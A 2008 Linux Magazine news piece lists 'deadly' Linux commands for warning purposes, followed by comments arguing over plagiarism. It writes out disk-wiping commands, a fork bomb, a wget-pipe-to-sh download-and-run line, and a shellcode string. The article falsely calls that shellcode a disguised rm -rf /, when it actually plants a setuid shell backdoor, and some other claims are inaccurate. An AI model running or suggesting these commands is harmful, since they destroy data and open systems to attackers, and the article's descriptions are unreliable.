Seven Deadliest Linux Commands

Nov 21, 2008

In a TechSource Blog blog, Philippine technology student Jun Auza has assembled a list of the seven deadliest Linux commands, which his readers promptly augmented.

Auza warns new forum and chat participants not to fall into the trap of calling each other "dumbheads."

CAUTION! All commands included in the blog and that appear here actually destroy a complete Linux system. Those wishing to try them should do so on a separate, virtual machine. Please proceed at your own risk!

The first, classic deadly command is certainly:

rm -rf/

The command starts at root and will forcefully delete all files recursively. The result: the hard disk and all relevant files are wiped out.

A corollary to the first deadly command is its hex equivalent:

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

According to Auza, this encrypted version of rm -rf/ can "deceive even the rather experienced Linux users."

A deletion that might proceed somewhat faster than a complete hard disk wipeout is:

mkfs.ext3 /dev/sda

The command will do horrible things to sda.

If losing data were bad enough, consider this command:

:(){:|:&};:

It executes enough processes to freeze your system and completely corrupt your data. It is also known as the "forkbomb." Should you use the command in a startup script, at least a system message will mitigate the effect.

Back to the hard disk, with this command:

any_command > /dev/sda

The any_command can be for a favorite program that might output some terminal data, but in this case it writes it to the sda hard disk. As a rule, all data will span partitions and the entire filesystem will cross the River Styx.

Even Linux has so-called rootkits, malware that takes control of root and transforms the PC into an unwilling zombie. All you need is some_untrusted_source on the Web and use wget on it:

wget http:// some_untrusted_source -O- | sh

The command certainly invites trouble from the untrusted URL in the way of possible rootkits with malicious code.

The last of the seven deadliest commands Auza calls the /dev/null trick:

mv /home/my_home_directory/* /dev/null

Everything you move to /dev/null, such as your favorite home directory, will end up in the Big Garbage Heap.

As the responses to the blog steadily grow, many additional ways to destroy your Linux system are beginning to emerge. A prominent one is:

dd if=/dev/urandom of=/dev/sda

This fills the sda disk with random numbers. Oh joy!

Users should be especially wary of requests involving root privileges, the rm -rf or dd commands, redirection (via "|" and ">"), or using a hard disk (such as /dev/sda) as a parameter.

Related content

Comments

  • jdong

    The language is similar because it contains a lot of *terminology* and *stock phrases*. The author is guilty of writing unimaginative prose, not plagiarism. *You're* guilty of having a proprietary attitude and seeking to claim some kind of ownership of a few *not very obscure!* commands and tricks. Who are you, Billy G? Did you patent that forkbomb? Maybe you have IP rights over the word clobber (man wget)? You can pull this lamer nonsense at ubuntuforums but away from there you don't get to moderate comments, delete posts or come over as a big shot. You are a muppet.
  • Even more deadly

    I've come across an even more deadly command...

    $ source ~/.bash_history

    Well, how would you clean up THIS mess you just made?
  • data protection

    I keep my / /home and even my personal files on separate partitions. Whats more my important data lives on two external drives. If you have data you can't afford to lose or simply chose not to it is relatively simple to prevent it. The only way i lose all my data is if my house burns down(knock on wood).
  • Not really that dangerous....

    An operating system that actually does what people ask it to do? I don't see what's wrong with that.

    Mind you, people would need to be signed in as root for these commands to do any significant damage (sudo or su will do), but as I keep saying to people, if they don't backup data they deserve to lose it.

    Dad just lost 4 years of digital photos from a HDD crash--no funny commands there, and had prior to that his system plagued by virii before switching to GNU/Linux.

    Other than that, great article!
  • stolen indeed

    I don't mind people using content from the forums but as mentioned, all of the content is under a CC license. The examples are used in mostly the same order, and a lot of the wording choices are the same. Considering how the exact same examples were used, I find that hard to dismiss as a coincidence. the original version also had the assertion that "rm -rf .*" matches ../ and recurses upwards to destroy parent directories, which I purposely put in the original announcement to see if readers were paying attention. After 20 comments on the blog pointing out that it was incorrect, it looks like that command has been removed.


    Not convinced? Let's look at a quick side-by-side:


    Blog:
    Known as forkbomb, this command will tell your system to execute a huge number of processes until the system freezes. This can often lead to corruption of data.

    UF announcement:
    Forkbomb: Executes a huge number of processes until system freezes, forcing you to do a hard reset which may cause corruption, data damage, or other awful fates.

    Blog:
    With this command, raw data will be written to a block device that can usually clobber the filesystem resulting in total loss of data.

    UF annoucnement
    Block device manipulation: Causes raw data to be written to a block device. Often times this will clobber the filesystem and cause total loss of data




    If you think this wording choice is similar only by coincidence, then fine. happy
  • not stolen

    It isn't "stolen". It merely contains the same commands. Do the ubuntuforums moderators (lamers) claim proprietary rights to shell commands? Idiots. The English text is different; different structure, phrases etc. Not just a little different, but entirely dissimilar, obviously original and not plagiarised. Nobody copied your lame post so stop p*ssing your pants and stick to bullying people on your crappy forum.
  • Stolen from UbuntuForums announcement

    This blog post is mostly stolen from http://ubuntuforums.org/announcement.php?f=326, which is cc-by-sa. The wording is similar, the commands are similar, and the mistakes are similar, too.
comments powered by Disqus
Subscribe to our Linux Newsletters
Find Linux and Open Source Jobs
Subscribe to our ADMIN Newsletters

Support Our Work

Linux Magazine content is made possible with support from readers like you. Please consider contributing when you’ve found an article to be beneficial.

Learn More

News